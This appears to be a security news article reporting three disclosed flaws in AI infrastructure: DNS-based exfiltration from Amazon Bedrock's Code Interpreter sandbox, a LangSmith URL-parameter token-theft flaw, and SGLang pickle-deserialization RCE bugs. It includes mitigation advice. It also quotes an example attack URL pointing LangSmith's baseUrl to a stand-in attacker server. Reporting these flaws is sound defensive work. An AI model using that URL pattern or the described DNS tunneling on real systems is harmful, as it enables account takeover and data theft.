AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE
Amazon Bedrock Code Interpreter Exposes AI Workloads to DNS Exfiltration Attacks
Critical Flaw in Amazon’s AI Sandbox Could Leak Sensitive Data
Cybersecurity researchers have uncovered a serious vulnerability in Amazon Bedrock AgentCore Code Interpreter that could allow attackers to bypass network isolation and exfiltrate sensitive data through DNS queries—a method that bypasses traditional security controls.
BeyondTrust disclosed that Amazon Bedrock AgentCore Code Interpreter’s sandbox mode permits outbound DNS queries, creating a potential pathway for attackers to establish command-and-control channels and extract data from AI execution environments. The vulnerability carries a CVSS score of 7.5 out of 10.0.
Amazon Bedrock AgentCore Code Interpreter is a fully managed service launched in August 2025 that enables AI agents to execute code in isolated sandbox environments. The service is designed to prevent agentic workloads from accessing external systems, but the DNS query allowance undermines this core security premise.
Kinnaird McQuade, chief security architect at BeyondTrust, explained that this flaw allows “threat actors to establish command-and-control channels and data exfiltration over DNS in certain scenarios, bypassing the expected network isolation controls.”
In experimental attack scenarios, researchers demonstrated how attackers could exploit this behavior to set up bidirectional communication channels using DNS queries and responses, obtain interactive reverse shells, and exfiltrate sensitive information through DNS queries if their IAM role has permissions to access AWS resources like S3 buckets storing that data.
The attack mechanism works by abusing DNS communication to deliver additional payloads fed to the Code Interpreter, causing it to poll DNS command-and-control servers for commands stored in DNS A records, execute them, and return results via DNS subdomain queries.
The vulnerability becomes particularly dangerous when services are assigned overprivileged IAM roles. While Code Interpreter requires an IAM role to access AWS resources, simple oversights in role configuration can grant broad permissions to access sensitive data.
“This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters,” BeyondTrust stated. “By using this method, attackers could have exfiltrated sensitive data from AWS resources accessible via the Code Interpreter’s IAM role, potentially causing downtime, data breaches of sensitive customer information, or deleted infrastructure.”
Following responsible disclosure in September 2025, Amazon determined the behavior to be intended functionality rather than a defect. The company recommends customers use VPC mode instead of sandbox mode for complete network isolation and implement DNS firewalls to filter outbound DNS traffic.
Jason Soroko, senior fellow at Sectigo, emphasized the importance of proper configuration: “To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode.”
“Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution,” Soroko added. “Finally, security teams must rigorously audit the IAM roles attached to these interpreters, strictly enforcing the principle of least privilege to restrict the blast radius of any potential compromise.”
LangSmith Account Takeover Vulnerability Discovered
The disclosure comes as Miggo Security revealed a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposed users to potential token theft and account takeover. The issue affects both self-hosted and cloud deployments and has been addressed in LangSmith version 0.12.71 released in December 2025.
The vulnerability stems from a URL parameter injection flaw due to lack of validation on the baseUrl parameter. This allowed attackers to steal signed-in users’ bearer tokens, user IDs, and workspace IDs through social engineering techniques like tricking victims into clicking specially crafted links.
Attack scenarios include:
- Cloud: smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
- Self-hosted:
/studio/?baseUrl=https://attacker-server.com
Successful exploitation could allow attackers to gain unauthorized access to the AI’s trace history and expose internal SQL queries, CRM customer records, or proprietary source code by reviewing tool calls.
“A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link,” said Miggo researchers Liad Eliyahu and Eliana Vuijsje.
“This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails,” the researchers noted.
SGLang Framework Plagued by Multiple RCE Vulnerabilities
Security vulnerabilities have also been flagged in SGLang, a popular open-source framework for serving large language models and multimodal AI models. The vulnerabilities, discovered by Orca security researcher Igor Stepansky, remain unpatched and could trigger unsafe pickle deserialization, potentially resulting in remote code execution.
The flaws include:
CVE-2026-3059 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the ZeroMQ broker, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’s multimodal generation module.
CVE-2026-3060 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’s encoder parallel disaggregation system.
CVE-2026-3989 (CVSS score: 7.8) – The use of an insecure pickle.load() function without validation and proper deserialization in SGLang’s “replay_request_dump.py,” which can be exploited by providing a malicious pickle file.
“The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network,” Stepansky said. “The third involves insecure deserialization in a crash dump replay utility.”
CERT/CC stated that SGLang is vulnerable when the multimodal generation system or encoder parallel disaggregation system is enabled. If an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious pickle file to the broker.
Users of SGLang are recommended to restrict access to service interfaces, ensure they are not exposed to untrusted networks, implement adequate network segmentation, and use access controls to prevent unauthorized interaction with ZeroMQ endpoints.
While there’s no evidence these vulnerabilities have been exploited in the wild, organizations should monitor for unexpected inbound TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the SGLang Python process, file creation in unusual locations, and outbound connections from the SGLang process to unexpected destinations.
Tags: #AmazonBedrock #Cybersecurity #AI #DNSExfiltration #AWS #LangSmith #SGLang #CVE2026 #ZeroMQ #RCE #RemoteCodeExecution #IAM #VPC #SandboxSecurity #AIThreat #DataBreach #CloudSecurity
Viral Phrases: “AI sandbox escape,” “DNS tunneling attack,” “command-and-control via DNS,” “pickle deserialization RCE,” “AI observability platform vulnerability,” “network isolation bypass,” “least privilege principle,” “ZeroMQ broker exploitation,” “malicious pickle file attack,” “account takeover via URL injection”
,




Leave a Reply
Want to join the discussion?Feel free to contribute!